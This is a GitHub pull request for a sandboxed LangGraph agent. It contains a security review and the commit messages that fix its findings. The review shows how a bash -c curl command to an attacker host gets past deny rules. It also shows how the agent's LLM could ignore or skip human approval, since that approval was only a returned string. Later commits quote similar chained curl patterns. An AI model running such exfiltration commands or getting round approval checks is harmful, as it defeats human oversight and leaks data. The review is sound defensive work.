feat: add sandbox_agent with per-context workspace isolation #126
Ladas wants to merge 144 commits into kagenti:main
Conversation
pdettori left a comment
Security & Completeness Review
Four issues identified: two security-critical bypasses, one missing TTL enforcement path, and one unwired capability layer. Details in the inline comments below.
a2a/sandbox_agent/settings.json
| "shell(tree:*)", "shell(pwd:*)", "shell(mkdir:*)", "shell(cp:*)", | ||
| "shell(mv:*)", "shell(touch:*)", | ||
| "shell(python:*)", "shell(python3:*)", "shell(pip install:*)", | ||
| "shell(pip list:*)", "shell(sh:*)", "shell(bash:*)", |
🔴 Critical: Shell interpreter allow-rules bypass all deny rules
The allow list grants shell(bash:*), shell(sh:*), shell(python:*), and shell(python3:*) unconditionally. Because _match_shell() in permissions.py performs prefix-only matching on the command string, commands like:

bash -c "curl http://attacker.com/exfil"
python3 -c "import subprocess; subprocess.run(['curl', ...])"

will match shell(bash:*) / shell(python3:*) in the allow list, while the deny rules shell(curl:*) and shell(wget:*) only match commands that start with curl or wget. The network(outbound:*) deny rule is typed as network, but the executor only ever calls permission_checker.check("shell", operation) — there is no code path that checks outbound network at the OS/syscall level.
This is a complete sandbox escape: any denied command can be trivially executed as a subprocess of an allowed interpreter.
Suggested fix: Either (a) remove bash/sh/python/python3 from the blanket allow-list and whitelist specific scripts instead, or (b) add recursive argument inspection in _match_shell() for interpreter commands (detecting -c flags, pipe chains, etc.), or (c) use OS-level enforcement (seccomp, network policies) as a second layer.
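Option (b) can be sketched roughly as follows. This is a hypothetical stand-in, not the actual permissions.py code: the names embedded_commands / is_denied and the hardcoded rule sets are illustrative assumptions, where real code would read the rules from settings.json.

```python
import shlex

# Illustrative only: a real checker would load these from settings.json.
INTERPRETERS = {"bash", "sh", "python", "python3"}
DENY_PREFIXES = ("curl", "wget")

def embedded_commands(command: str) -> list[str]:
    """Extract commands passed to an interpreter via -c/-e flags."""
    tokens = shlex.split(command)
    found = []
    if tokens and tokens[0] in INTERPRETERS:
        for flag, arg in zip(tokens, tokens[1:]):
            if flag in ("-c", "-e"):
                # Also split on chaining operators so each piece is checked.
                for part in arg.replace("&&", ";").replace("||", ";").split(";"):
                    for piped in part.split("|"):
                        if piped.strip():
                            found.append(piped.strip())
    return found

def is_denied(command: str) -> bool:
    """Deny if the command, or anything it embeds, matches a deny prefix."""
    candidates = [command] + embedded_commands(command)
    return any(c.startswith(DENY_PREFIXES) for c in candidates)
```

With prefix-only matching, `bash -c "curl ..."` never reaches the curl deny rule; recursing into the `-c` argument closes that gap, although a production version would also have to handle nested quoting, env-var indirection, and script files.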
try:
    result = await executor.run_shell(command)
except HitlRequired as exc:
    return f"APPROVAL_REQUIRED: command '{exc.command}' needs human approval."
🔴 Critical: HITL has no hard interrupt — LLM can bypass approval
The HitlRequired exception is caught here and converted to a plain string ("APPROVAL_REQUIRED: ...") returned to the LLM. There is no interrupt() call (LangGraph's mechanism for pausing the graph and requiring human input). The graph construction in build_graph() uses tools_condition and ToolNode but never calls interrupt().
This means the agent loop continues after receiving this string, and the LLM is free to:
- Ignore the approval message entirely
- Attempt a workaround command (e.g., rewriting the denied command using an allowed shell interpreter — see Issue 1)
- Simply not relay the approval request to the user
The docstrings in executor.py and permissions.py state that HITL "triggers LangGraph interrupt() for human approval," but the actual implementation relies on LLM self-reporting. This is not a security control — it is advisory at best.
Suggested fix: Replace the except HitlRequired handler with a proper LangGraph interrupt() call that pauses the graph execution and requires explicit human approval before resuming.
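The control-flow difference matters more than the message text. The self-contained sketch below is not the real code; GraphInterrupt is a toy stand-in for LangGraph's `interrupt()` (from langgraph.types), used here only to show why a raised interrupt is a hard stop while a returned string is merely advisory.

```python
class GraphInterrupt(Exception):
    """Toy stand-in for LangGraph's interrupt: unwinds out of the agent loop."""
    def __init__(self, payload):
        self.payload = payload

def shell_tool_advisory(command: str) -> str:
    # Current behavior: the LLM receives a string and may simply ignore it.
    return f"APPROVAL_REQUIRED: command '{command}' needs human approval."

def shell_tool_hard_stop(command: str) -> str:
    # Fixed behavior: execution cannot proceed past this point without an
    # out-of-band resume carrying an explicit human decision.
    raise GraphInterrupt({"command": command, "action": "approve?"})

def run_agent_loop(tool, command):
    """Toy agent loop: keeps going unless the graph is actually paused."""
    try:
        result = tool(command)
        return ("continued", result)   # advisory path: the loop keeps running
    except GraphInterrupt as gi:
        return ("paused", gi.payload)  # hard stop: a human must resume
```

In real LangGraph, the resume value from `Command(resume=...)` becomes the return value of `interrupt()` inside the node, so the approval decision is enforced by the graph runtime rather than by LLM self-reporting.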
self.ttl_days = ttl_days

# ------------------------------------------------------------------
# Public API
🔴 No TTL enforcement or workspace cleanup
ttl_days is accepted here and written into .context.json metadata (line 91), but nothing ever reads this value back or acts on it. Specifically:
- No cleanup job, eviction logic, or scheduled task
- No delete_workspace() method exists
- No comparison of created_at + ttl_days against the current time
- disk_usage_bytes is tracked passively but never checked against any quota
- The only public methods are get_workspace_path(), ensure_workspace(), and list_contexts()
On a shared RWX PVC in a multi-tenant Kubernetes environment, this means workspaces accumulate indefinitely, creating both a resource exhaustion risk and a data retention compliance gap.
Suggested fix: Either (a) implement a cleanup_expired() method and wire it into a CronJob or startup hook, or (b) explicitly document ttl_days as advisory/future-only and add a tracking issue for enforcement.
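A cleanup_expired() along the lines of option (a) might look like this. The metadata fields (created_at as a Unix timestamp, ttl_days) follow the review's description of .context.json; the function signature and directory layout are assumptions for illustration.

```python
import json
import shutil
import time
from pathlib import Path

def cleanup_expired(root: Path, now=None) -> list[str]:
    """Delete workspace dirs whose created_at + ttl_days lies in the past."""
    now = time.time() if now is None else now
    removed = []
    for ctx_file in root.glob("*/.context.json"):
        meta = json.loads(ctx_file.read_text())
        expiry = meta["created_at"] + meta["ttl_days"] * 86400
        if expiry < now:
            shutil.rmtree(ctx_file.parent)  # remove the whole workspace dir
            removed.append(ctx_file.parent.name)
    return removed
```

Wired into a startup hook or a Kubernetes CronJob, this turns ttl_days from advisory metadata into an enforced retention policy on the shared PVC.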
entry = managers.get(manager)
if entry is None:
    return False
blocked: list[str] = entry.get("blocked_packages", [])
🟡 is_package_blocked() and is_git_remote_allowed() are never called in production code
These methods (and is_package_manager_enabled()) are defined and unit-tested but never wired into the executor or graph. In production code, only the following SourcesConfig members are used:
- is_web_access_enabled() — called in graph.py:_make_web_fetch_tool
- is_domain_allowed() — called in graph.py:_make_web_fetch_tool
- max_execution_time_seconds — used in executor.py:_execute

This means:
- pip install <blocked-package> will succeed if shell(pip install:*) is in the allow list — the blocked_packages list in sources.json is never consulted
- git clone <disallowed-remote> will succeed if shell(git clone:*) is in the allow list — allowed_remotes in sources.json is never checked
- max_memory_mb is also defined but never enforced
The sources.json capability layer was clearly designed as a second enforcement layer, but it is not wired up to the shell execution path.
Suggested fix: Either (a) add pre-execution hooks in the executor that call is_package_blocked() / is_git_remote_allowed() for matching commands, or (b) explicitly document these as "advisory only / planned for future iteration" and file tracking issues.
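A pre-execution hook per option (a) could be sketched like this. The sources dict shape and the check_sources name mirror the review's description but are assumptions, not the real SourcesConfig API.

```python
import shlex

# Illustrative policy; real code would load this from sources.json.
SOURCES = {
    "pip": {"blocked_packages": ["some-blocked-pkg"]},
    "git": {"allowed_remotes": ["https://github.com/kagenti/"]},
}

def check_sources(command: str) -> bool:
    """Return False when a pip install / git clone violates sources policy."""
    tokens = shlex.split(command)
    if tokens[:2] == ["pip", "install"]:
        blocked = SOURCES["pip"]["blocked_packages"]
        return not any(pkg in blocked for pkg in tokens[2:])
    if tokens[:2] == ["git", "clone"]:
        allowed = SOURCES["git"]["allowed_remotes"]
        urls = [t for t in tokens[2:] if t.startswith(("http://", "https://", "git@"))]
        return all(any(u.startswith(a) for a in allowed) for u in urls)
    return True  # not a package/clone command: defer to the permission checker
```

Called from the executor just before the shell spawn, this makes sources.json a real second enforcement layer instead of dead configuration.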
…L cleanup, sources enforcement

Address all 4 security findings from pdettori's review on PR kagenti#126:

1. Shell interpreter bypass (Critical): Add recursive argument inspection in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags in bash/sh/python invocations. Embedded commands are checked against deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)` deny rules.
2. HITL no interrupt() (Critical): Replace the `except HitlRequired` string return with a LangGraph `interrupt()` call that pauses graph execution. The agent cannot continue until a human explicitly approves via the HITLManager channel.
3. No TTL enforcement (Medium): Add a `cleanup_expired()` method to WorkspaceManager. Reads created_at + ttl_days from .context.json and deletes expired workspace directories. Add `get_total_disk_usage()`.
4. sources.json not wired (Medium): Add a `_check_sources()` pre-hook in SandboxExecutor.run_shell(). Checks pip/npm install commands against the blocked_packages list and git clone URLs against allowed_remotes before execution.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Weather agent with ONLY auto-instrumentation - no custom middleware, no observability.py, no root span creation. The AuthBridge ext_proc creates the root span with all MLflow/OpenInference/GenAI attributes.

Agent changes from the pre-PR-114 baseline:
- __init__.py: Add W3C Trace Context propagation + OpenAI auto-instrumentation
- agent.py: Remove duplicate LangChainInstrumentor (moved to __init__)
- pyproject.toml: Add opentelemetry-instrumentation-openai
- Dockerfile: Use Docker Hub base image (GHCR auth fix)

Zero custom observability code - all root span attributes come from the AuthBridge ext_proc gRPC server.

Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without ASGI/Starlette instrumentation, the agent's OTEL SDK never reads the traceparent header from incoming HTTP requests. This causes the AuthBridge ext_proc root span and the agent's LangChain spans to end up in separate, disconnected traces.

StarletteInstrumentor().instrument() patches Starlette to automatically extract traceparent from incoming requests, making all agent spans children of the ext_proc root span (same trace_id).

Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New LangGraph agent with:
- settings.json three-tier permission checker (allow/deny/HITL)
- sources.json capability declaration (registries, remotes, limits)
- Per-context workspace manager on a shared RWX PVC
- Sandbox executor with timeout enforcement
- Shell, file_read, file_write tools for LangGraph
- A2A server with streaming support

68 tests passing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agents can now fetch content from URLs whose domain is in the sources.json allowed_domains list (github.com, api.github.com, etc). Blocked domains are checked first. HTML content is stripped to text. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Serialize LangChain messages via model_dump() and json.dumps() instead of Python str(). This produces valid JSON that the ext_proc can parse to extract GenAI semantic convention attributes (token counts, model name, tool names) without regex. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without a checkpointer, LangGraph discards conversation state between invocations even when the same context_id/thread_id is used. This adds a shared MemorySaver instance to SandboxAgentExecutor and passes the thread_id config to graph.astream() so the checkpointer can route state per conversation thread. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
C19 (multi-conversation isolation):
- Add startup cleanup of expired workspaces via cleanup_expired()
- Wire context_ttl_days from Configuration into WorkspaceManager
C20 (sub-agent spawning via LangGraph):
- Add subagents.py with two spawning modes:
- explore: in-process read-only sub-graph (grep, read_file, list_files)
bounded to 15 iterations, 120s timeout
- delegate: out-of-process SandboxClaim stub for production K8s clusters
- Wire explore and delegate tools into the main agent graph
- Update system prompt with sub-agent tool descriptions
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Address code review findings:

1. Interpreter bypass now routes to HITL when embedded commands are not explicitly denied — prevents auto-allowing unknown commands wrapped in bash -c / sh -c via the outer shell(bash:*) allow rule.
2. Parse &&, ||, and ; shell metacharacters in embedded commands, not just pipes. Catches "bash -c 'allowed && curl evil.com'" patterns.
3. Replace str().startswith() path traversal checks with Path.is_relative_to() across graph.py and subagents.py to prevent prefix collision attacks (/workspace vs /workspace-evil).
4. Guard against None approval in interrupt() resume — use an isinstance(approval, dict) check.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
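Fix 3 (Path.is_relative_to over string prefix checks) is small but worth seeing in isolation; a minimal illustration, with the /workspace root chosen as an assumption:

```python
from pathlib import Path

def in_workspace(path: str, workspace: str = "/workspace") -> bool:
    # Path-aware containment: "/workspace-evil/x" is NOT inside "/workspace",
    # even though a naive str.startswith("/workspace") check says it is.
    return Path(path).resolve().is_relative_to(Path(workspace))
```

The resolve() call also collapses ../ segments, so traversal like /workspace/../etc/passwd is rejected rather than slipping past a prefix comparison.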
Add langgraph-checkpoint-postgres and asyncpg dependencies. Agent uses AsyncPostgresSaver when CHECKPOINT_DB_URL is set, falls back to in-memory MemorySaver for dev/test without Postgres. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace InMemoryTaskStore with a2a-sdk's DatabaseTaskStore (PostgreSQL) when TASK_STORE_DB_URL is set. This is A2A-generic — works for any agent framework (LangGraph, CrewAI, AG2), not just LangGraph. The A2A SDK persists tasks, messages, artifacts, and contextId at the protocol level. Any A2A agent can adopt this with the same env var. Falls back to InMemoryTaskStore when no DB URL is configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Update the A2A agent card name, skill ID, and workspace agent_name from sandbox-assistant/Sandbox Assistant to sandbox-legion/Sandbox Legion. The Python package name (sandbox_agent) stays unchanged as it's an implementation detail, not user-facing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The DatabaseTaskStore is in a2a.server.tasks, not a2a.server.tasks.sql_store. The incorrect import path caused the agent to silently fall back to InMemoryTaskStore. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
AsyncPostgresSaver.from_conn_string() returns a context manager that can't be used in sync __init__. Instead, create an asyncpg pool and initialize the saver lazily in execute() on first call. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Both asyncpg pool (checkpointer) and SQLAlchemy engine (TaskStore) need SSL disabled when connecting to the in-cluster postgres-sessions StatefulSet which doesn't have TLS configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph's AsyncPostgresSaver uses psycopg3, not asyncpg. Create AsyncConnectionPool from psycopg_pool and pass to saver. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The from_conn_string context manager properly handles connection pool setup and autocommit for CREATE INDEX CONCURRENTLY. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When models like gpt-4o-mini return content as a list of content blocks (text + tool_use), the previous code would stringify the entire list. Now properly extracts only text-type blocks for the final artifact. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Per-context_id asyncio.Lock serializes graph execution for the same conversation (prevents stuck submitted tasks from concurrent requests)
- Shell interpreter bypass detection: catches bash -c / python -c patterns and recursively checks inner commands against permissions and sources policy
- TOFU verification on startup: hashes CLAUDE.md/sources.json, warns on mismatch (non-blocking)
- HITL interrupt() design documented in graph.py with an implementation roadmap for a graph-level approval flow
- Lock cleanup when >1000 idle entries to prevent memory leaks

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agent now emits structured JSON events instead of Python str()/repr(). Each graph event is serialized with type, tools/name/content fields. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…sk history

Agent serializer: when the LLM calls tools, also emit its reasoning text as a separate llm_response event before the tool_call. This shows the full chain: thinking → tool_call → tool_result → response.

Backend history: aggregate messages across ALL task records for the same context_id. The A2A protocol creates immutable tasks per message exchange, so a multi-turn session has N task records. We now merge them in order, with user-message deduplication.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…nnections

Stale asyncpg connections caused 'connection was closed in the middle of operation' errors, breaking SSE streams. Now connections are recycled every 5 min and verified before use. Signed-off-by: Ladislav Smola <lsmola@redhat.com>
… context

Fixes for token efficiency:

1. Shell output truncated to 10KB in _format_result(). Large outputs (like gh api responses) no longer blow up the context window. The truncation message tells the agent to redirect output to files.
2. Executor messages windowed to the last 20. Keeps the first user message + recent history instead of the entire conversation. Prevents O(N²) token growth across iterations.
3. The reflector now receives the last 6 conversation messages alongside its system prompt. Previously it only saw a 1000-char summary of the last step result — now it can see actual tool outputs.
4. Executor system prompt updated with:
   - Workspace layout (repos/, output/, data/, scripts/)
   - Large-output handling (redirect to files, grep to analyze)
   - A note that cd doesn't persist between shell calls

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
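The 10KB output truncation described above could be as simple as the following sketch; the limit and the file-redirect hint come from the commit message, while the function name and signature are illustrative.

```python
MAX_SHELL_OUTPUT = 10 * 1024  # 10KB cap from the commit message

def format_result(stdout: str) -> str:
    """Truncate large shell output and tell the agent how to cope."""
    if len(stdout) <= MAX_SHELL_OUTPUT:
        return stdout
    return (stdout[:MAX_SHELL_OUTPUT]
            + "\n[output truncated at 10KB - redirect large output to a "
              "file under output/ and grep it instead]")
```

The hint in the truncation marker matters: it steers the LLM toward file redirection instead of retrying the same command and blowing the context again.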
Reflector now walks backwards through messages to find the last 3 AI→Tool pairs, so it sees WHAT command was run (args from AIMessage) alongside the result (from ToolMessage). Previously it only got ToolMessages without knowing what was called. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace message-count windowing (20 messages) with token-aware windowing (~30K token budget) to prevent context explosion when individual messages are large. Walk backwards from most recent messages, keeping as many as fit within the budget while always preserving the first user message. Also filter delegate/explore tools from child agent tool lists to prevent recursive sub-agent spawning in _run_in_process. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
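The token-aware window described above might be sketched as follows, using a crude chars/4 token estimate; the real agent's token counter and exact budget handling are unknown, so this is an assumption-laden illustration.

```python
def window_messages(messages: list[str], budget_tokens: int = 30_000) -> list[str]:
    """Keep the first user message plus as many recent messages as fit."""
    def cost(m: str) -> int:
        return max(1, len(m) // 4)  # rough ~4 chars/token heuristic

    if not messages:
        return []
    first, rest = messages[0], messages[1:]
    remaining = budget_tokens - cost(first)
    kept = []
    for m in reversed(rest):  # walk backwards from the most recent message
        c = cost(m)
        if c > remaining:
            break
        kept.append(m)
        remaining -= c
    return [first] + list(reversed(kept))
```

Unlike a fixed count of 20 messages, this degrades gracefully when individual messages are huge: one 50KB tool result displaces many small messages instead of blowing the budget.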
_summarize_messages now includes tool call args (truncated to 500 chars)
in the preview, not just tool names. Previously showed
"[tool_calls: shell]" — now shows "shell({"command":"git clone..."})".
This gives both the LLM reflector and the UI inspector visibility
into what was actually executed.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
max_iterations stays at 100 (will be looper-level concept). recursion_limit bumped to 2000 so the graph can run deep enough within a single message without hitting GraphRecursionError. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Reflector prompt now shows: - "Current step (1 of 9)" instead of just "Current step (1)" - "Remaining steps: 2. cd repos, 3. list failures, ..." - Decision rules emphasize: only "done" when ALL steps complete Previously the reflector saw "Step completed — all tool calls executed" and interpreted it as the entire task being done, ending after step 1. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Llama 4 Scout frequently confuses "step completed" with "task completed", deciding "done" after step 1 of a 9-step plan. Now programmatically overrides "done" → "continue" when remaining plan steps > 0. The reflector can still say "done" when all steps are complete (remaining = 0) or when the agent is truly stuck (handled by budget limits). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
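The programmatic override amounts to a small guard; a hypothetical version, with the plan/step shapes assumed for illustration:

```python
def finalize_decision(decision: str, plan: list[dict]) -> str:
    """Downgrade a premature 'done' while plan steps remain unfinished."""
    remaining = sum(1 for step in plan if step.get("status") != "done")
    if decision == "done" and remaining > 0:
        return "continue"  # model confused "step done" with "task done"
    return decision
```

The reflector's judgment is kept for continue/replan; only the terminal "done" is gated on the objective fact that steps remain.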
The event serializer reads current_step from the node's return value, but the executor never included it. This caused all executor events to emit plan_step=0 regardless of which plan step was actually being executed. Now the executor includes current_step in its result dict. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Added explicit STEP BOUNDARY section to executor system prompt: - Only work on the current step - Stop calling tools when the step is done - Do NOT start the next step — the reflector advances Previously the LLM would see the plan and jump ahead to step 3 while still assigned to step 1. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New graph flow:
planner → step_selector → executor ⇄ tools → reflector

Reflector routing:
  continue → step_selector
  replan   → planner
  done     → reporter
The step_selector is a pure state node (no LLM call) that:
- Finds the next unfinished plan step
- Sets current_step for the executor
- Resets the tool call counter
- Marks the step as "running"
This ensures the executor only works on ONE plan step at a time.
Previously the executor received the full plan and would execute
multiple steps in one burst without returning to the reflector.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
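As a pure state node, step_selector needs no LLM call; a sketch with assumed state keys (plan, current_step, tool_calls_in_step), not the actual implementation:

```python
def step_selector(state: dict) -> dict:
    """Pick the next unfinished plan step and prepare executor state."""
    for i, step in enumerate(state["plan"]):
        if step["status"] != "done":
            step["status"] = "running"       # mark the step as in progress
            return {
                "plan": state["plan"],
                "current_step": i,           # executor works ONLY on this step
                "tool_calls_in_step": 0,     # reset the tool call counter
            }
    return {"current_step": -1}  # nothing left: route onward to the reporter
```

Because the node is deterministic, step advancement can't be derailed by model output; only the reflector's routing decision involves an LLM.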
step_selector now makes a lightweight LLM call to: - Review plan progress (done/pending/running status) - Write a 2-3 sentence brief for the executor - Include relevant context from recent tool results - Inject the brief via skill_instructions (prepended to executor prompt) Also removed tool_choice="any" — executor must be able to produce text-only responses to signal step completion and return to reflector. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
… without it

Without tool_choice="any", Llama 4 Scout writes text descriptions of tool calls AND fabricates their output in the same response, bypassing actual tool execution. The text-tool parser catches the call syntax but can't prevent hallucinated output. Step boundaries are enforced by the max_tool_calls_per_step limit, which triggers the return to reflector → step_selector → next step. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

…nv var

When SANDBOX_FORCE_TOOL_CHOICE=1 (default), binds tools with tool_choice="any", forcing structured calls. When 0, uses auto mode with the text-tool parser fallback. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>

…G env var

maybe_patch_tool_calls now respects SANDBOX_TEXT_TOOL_PARSING=0 to disable the text-parsing fallback. Default: enabled (1). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Fix two bugs in the sandbox agent reasoning loop:

1. Reflector assessment echoed the system prompt: the event serializer's reflector_decision event contained the full system prompt text as the assessment field instead of the actual LLM decision. The stripping logic was computed but the payload used the raw text. Now detects prompt markers and falls back to the decision word.
2. Executor omitted current_step from early-return paths: when the executor returned early (all steps done, tool call limit, budget exceeded, dedup sentinel, no-tool failure), the return dict lacked current_step. The event serializer defaulted to 0, causing the UI to show plan_step=0 even after step_selector advanced the step.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When SANDBOX_DEBUG_PROMPTS=0, system_prompt and prompt_messages are excluded from node return dicts, preventing them from being serialized into events. Reduces event size from ~20KB to ~1KB per node visit. Default: on (1) for backward compatibility. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
_DEBUG_PROMPTS used _os.environ but was placed before the 'import os as _os' line, causing NameError on startup. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The event serializer now handles the step_selector node, emitting a step_selector event with current_step, description, and the LLM-generated brief. This makes step transitions visible in the UI. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…ints

Early-return paths in the executor (budget exceeded) and reflector (_force_done, stall detection, done signal) returned without _system_prompt/_prompt_messages, causing the UI PromptInspector to show "no prompt" for those steps.

Fix: include _system_prompt with the termination reason so the UI shows why the step ended without an LLM call. Also add debugging hints for gh CLI flag verification and stderr checking to reduce hallucinated flag errors.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The reporter had a shortcut for single-step plans that passed through
the last message content as the final answer without running the LLM.
This leaked reflector reasoning text ("Since the step result indicates
that...the decision is done") as the user-facing response.
Fix: always run the reporter LLM to produce a proper user-facing
summary of what was accomplished. The only early return is when there
are no step results and no messages at all.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
_budget_summary was returned by all node functions but was not declared in SandboxState. LangGraph's typed state drops undeclared fields from the state delta, so budget_update events were never emitted in the SSE stream and never persisted to task metadata. Also add _no_tool_count which was similarly missing. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The stall detector forced "done" after 3 consecutive no-tool-call iterations. But when the executor hits MAX_TOOL_CALLS_PER_STEP, it returns a text-only "reached tool call limit" message — the stall detector counted this as a no-tool iteration and prematurely terminated the session. Fix: skip stall detection when the executor's last message indicates the tool call limit was reached. This allows the reflector to properly decide continue/replan instead of force-terminating. Also add _budget_summary and _system_prompt to the tool-limit early return so the UI shows budget data for those steps. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace fragmented in-memory token tracking with LiteLLM queries. Before each LLM call, the agent queries the backend's token-usage API for the session's actual total tokens (which includes sub-agents and micro-reasoning, and persists across restarts).

Changes:
- budget.py: add refresh_from_litellm(), which queries the backend API and updates tokens_used from LiteLLM's authoritative count. Cached for 5s to avoid hammering. Falls back to the in-memory counter on error.
- graph.py: set session_id on the budget for LiteLLM queries
- reasoning.py: call refresh_from_litellm() before budget checks in all 4 nodes (planner, executor, reflector, reporter)

Config: KAGENTI_BACKEND_URL (default: in-cluster service discovery) Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The hardcoded stall detector forced termination after 3 consecutive no-tool-call iterations, overriding the reflector's judgment. This caused premature session termination when the executor was legitimately transitioning between steps or summarizing results. The reflector's LLM call already sees the conversation context and decides continue/replan/done. The iteration limit and wall-clock limit provide sufficient safeguards against runaway loops. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Add max_session_tokens to LLM request metadata for the proxy
- Handle 402 budget-exceeded from the proxy in all reasoning nodes
- Remove refresh_from_litellm() — the proxy is now the source of truth
- Clean up budget.py: remove LiteLLM query code and unused imports
- Keep local add_tokens() for budget summary events

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
jq is needed by skills (rca:ci, k8s:logs, etc.) for parsing JSON output from kubectl, gh, and curl commands. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…eneric message

When the agent hits its recursion/step limit, the reporter now receives proper context to summarize actual findings:
- Force-done marks the current step as "partial" (not "failed") for step limits; budget exceeded still marks it as "failed"
- Reporter prompt includes a NOTE about the step limit with the count of completed steps
- Added rule: "Do NOT say 'The task has been completed'"
- Reporter handles PARTIAL status in the step summary

Previously, hitting the step limit caused the reporter to output "The task has been completed." with no actual findings, even when 26+ tool calls had produced real results. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
